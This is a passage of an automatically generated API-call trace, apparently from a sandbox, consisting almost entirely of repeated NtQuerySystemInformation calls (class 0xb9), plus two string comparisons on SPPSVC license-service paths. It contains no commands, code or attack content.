SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0271.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0271.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0271.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0271.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaa0, Length=0x28, ResultLength=0x0) [0271.269] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0271.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0271.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x40, ResultLength=0x0) [0271.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.283] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0271.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0271.292] NtQuerySystemInformation 